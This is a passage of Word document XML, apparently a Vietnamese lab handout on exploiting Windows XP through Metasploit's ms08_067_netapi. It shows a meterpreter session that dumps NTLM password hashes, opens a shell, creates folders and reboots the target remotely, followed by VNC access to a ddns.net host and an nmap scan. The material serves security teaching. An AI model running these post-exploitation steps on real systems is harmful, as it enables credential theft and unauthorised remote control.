        <w:t xml:space="preserve">NSD có thể </w:t>
      </w:r>
      <w:r w:rsidR="00F458FF">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>thực hiện các lệnh điều khiển từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="0427D3E3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>meterpreter &gt; help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="06F870ED" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="0410F630" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="27618EF9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Interface  1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="64B6B102" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>============</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="4FB18FAA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Name         : MS TCP Loopback interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="69E142D9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Hardware MAC : 00:00:00:00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="01CE73B9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>MTU          : 1520</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="683A4178" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>IPv4 Address : 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="1DEE7A74" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="60DC8729" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="073A13A1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Interface  2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="5A0FB1E5" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>============</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="2728970D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="5B37A709" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Hardware MAC : 00:0c:29:35:74:cb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="010FF1E5" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>MTU          : 1500</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="5BBF87B3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>IPv4 Address : 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="5DC5CFFE" w14:textId="08DF6926">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="6A6B461F">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>IPv4 Netmask : 255.255.255.</w:t>
      </w:r>
      <w:r w:rsidRPr="6A6B461F" w:rsidR="2DC4E07C">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>kdir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="08C93325" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="29BBCD30" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>admin:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="24BB6D80" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="456490C8" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="3E1314DC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>HelpAssistant:1000:1dd91531ddf512c0aeaf4b61d77eaaf2:f13746fcad3a9981b9e91799d1546f6b:::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="7D140B58" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:b44b14b0dba5764532ac9f0fd9c67d5a:::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="05041D7E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user01:1004:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="09EC1B41" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user02:1005:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="41DE5418" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user03:1006:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="094D0180" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="6A3F4ABD" w14:textId="539972FA">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="6A6B461F">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; cd c:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="19231A31" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="72B081FF" w14:textId="2C542950">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; mkdir c:\HoVaTen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="7877F650" w14:textId="4F3666DD">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; md </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC" w:rsidR="00CA4DC8">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>cong nghe thong tin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="2D3163CF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="008E3F20" w14:paraId="5ACEC2B5" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; shutdown -r -t 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00E93EBC" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="008E3F20" w14:paraId="491070AC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Shutting down...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="00501E1D" w:rsidRDefault="008E3F20" w14:paraId="16BF44F0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">Để xem </w:t>
      </w:r>
      <w:r w:rsidRPr="00501E1D">
        <w:t>lại</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve"> các session đang chạy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="00501E1D" w:rsidRDefault="00CF4C67" w14:paraId="42C4657B" w14:textId="2E7D4A01">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>msf6 exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="008E3F20">
        <w:t>(ms08_067_netapi) &gt; sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="00501E1D" w:rsidRDefault="008E3F20" w14:paraId="037605AA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">Mở lại session: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Các thông tin của session sẽ được hiển thị ra, muốn truy cập lại vào session nào thì dùng lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="00501E1D" w:rsidRDefault="00CF4C67" w14:paraId="61C40666" w14:textId="1064B25F">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>msf6 exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="008E3F20">
        <w:t>(ms08_067_netapi) &gt; sessions -i &lt;ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00960746" w:rsidP="000634C0" w:rsidRDefault="001028B8" w14:paraId="64495EE7" w14:textId="355B7B3E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc145594625" w:id="25"/>
      <w:bookmarkStart w:name="_Toc191141269" w:id="26"/>
      <w:r>
        <w:t>Truy xuất từ xa đến máy Windows XP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="001028B8" w:rsidP="001028B8" w:rsidRDefault="001028B8" w14:paraId="6E9F0E46" w14:textId="136A47CF">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidR="001028B8">
        <w:rPr/>
        <w:t>Dùng</w:t>
      </w:r>
      <w:r w:rsidR="001028B8">
        <w:rPr/>
        <w:t xml:space="preserve"> chức </w:t>
      </w:r>
      <w:r w:rsidR="001028B8">
        <w:rPr/>
        <w:t>năng</w:t>
      </w:r>
      <w:r w:rsidR="001028B8">
        <w:rPr/>
        <w:t xml:space="preserve"> VNC </w:t>
      </w:r>
      <w:r w:rsidR="001028B8">
        <w:rPr/>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidR="001028B8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001028B8">
        <w:rPr/>
        <w:t>MobaXterm</w:t>
      </w:r>
      <w:r w:rsidR="5885C82B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5885C82B">
        <w:rPr/>
        <w:t>hoặc</w:t>
      </w:r>
      <w:r w:rsidR="5885C82B">
        <w:rPr/>
        <w:t xml:space="preserve"> chức </w:t>
      </w:r>
      <w:r w:rsidR="5885C82B">
        <w:rPr/>
        <w:t>năng</w:t>
      </w:r>
      <w:r w:rsidR="5885C82B">
        <w:rPr/>
        <w:t xml:space="preserve"> Remote Desktop </w:t>
      </w:r>
      <w:r w:rsidR="5885C82B">
        <w:rPr/>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidR="5885C82B">
        <w:rPr/>
        <w:t xml:space="preserve"> Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001028B8" w:rsidP="001028B8" w:rsidRDefault="001028B8" w14:paraId="3C3A763E" w14:textId="0AC1E328">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidR="001028B8">
        <w:drawing>
          <wp:inline wp14:editId="69157482" wp14:anchorId="4B34202A">
            <wp:extent cx="5940427" cy="2662704"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1684306191" name="Picture 1684306191" descr="A screenshot of a computer&#10;&#10;Description automatically generated" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1684306191"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R1466c26201f44f19">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="0" t="0" r="0" b="41263"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0" flipH="0" flipV="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940427" cy="2662704"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00613B2F" w:rsidP="001028B8" w:rsidRDefault="00613B2F" w14:paraId="5ACA0FF4" w14:textId="1C861F5D">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00613B2F">
        <w:rPr/>
        <w:t>Địa</w:t>
      </w:r>
      <w:r w:rsidR="00613B2F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00613B2F">
        <w:rPr/>
        <w:t>chỉ</w:t>
      </w:r>
      <w:r w:rsidR="00613B2F">
        <w:rPr/>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="026CC99B">
        <w:rPr/>
        <w:t>wandertour</w:t>
      </w:r>
      <w:r w:rsidR="00613B2F">
        <w:rPr/>
        <w:t>.ddns.net</w:t>
      </w:r>
      <w:r w:rsidR="00613B2F">
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00613B2F">
        <w:rPr/>
        <w:t>cổng</w:t>
      </w:r>
      <w:r w:rsidR="00613B2F">
        <w:rPr/>
        <w:t>: 5110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E03BC3" w:rsidP="001028B8" w:rsidRDefault="00E03BC3" w14:paraId="15B0D616" w14:textId="7699579D">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00E03BC3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73C32801" wp14:editId="3030FECE">
            <wp:extent cx="5940425" cy="3732530"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1270"/>
            <wp:docPr id="1467538610" name="Picture 14675386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538610" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="3732530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="000634C0" w:rsidRDefault="008E3F20" w14:paraId="3836675F" w14:textId="5593C5CA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc145594626" w:id="27"/>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve">NOTE </w:t>
      </w:r>
      <w:r w:rsidR="6BE45458">
        <w:rPr/>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve">ác </w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t>lệnh</w:t>
      </w:r>
      <w:r w:rsidR="008E3F20">
        <w:rPr/>
        <w:t xml:space="preserve"> chính</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="00E3618C" w:rsidP="00E3618C" w:rsidRDefault="00E3618C" w14:paraId="57A3425A" w14:textId="26C99310">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>ping 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E3618C" w:rsidP="00E3618C" w:rsidRDefault="00E3618C" w14:paraId="2D355A34" w14:textId="0CCCC5B6">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>sudo nmap -v -A 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E3618C" w:rsidP="00532C5C" w:rsidRDefault="00E3618C" w14:paraId="22E8B683" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="1A288C11" w14:textId="1E1B8C47">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
